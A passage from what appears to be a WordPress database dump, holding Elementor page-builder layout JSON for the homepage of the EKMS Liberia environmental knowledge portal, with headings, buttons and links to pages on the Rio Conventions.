Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_marine.jpg\",\"id\":2158},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\",\"items_text_typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(19061,2791,'_elementor_version','2.7.5'),(19062,2791,'_elementor_template_type','wp-page'),(19063,2791,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(19067,2792,'_wp_page_template','default'),(19068,2792,'_elementor_edit_mode','builder'),(19069,2792,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\",\"background_slideshow_slide_transition\":\"slide_left\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\",\"padding\":{\"unit\":\"px\",\"top\":\"180\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\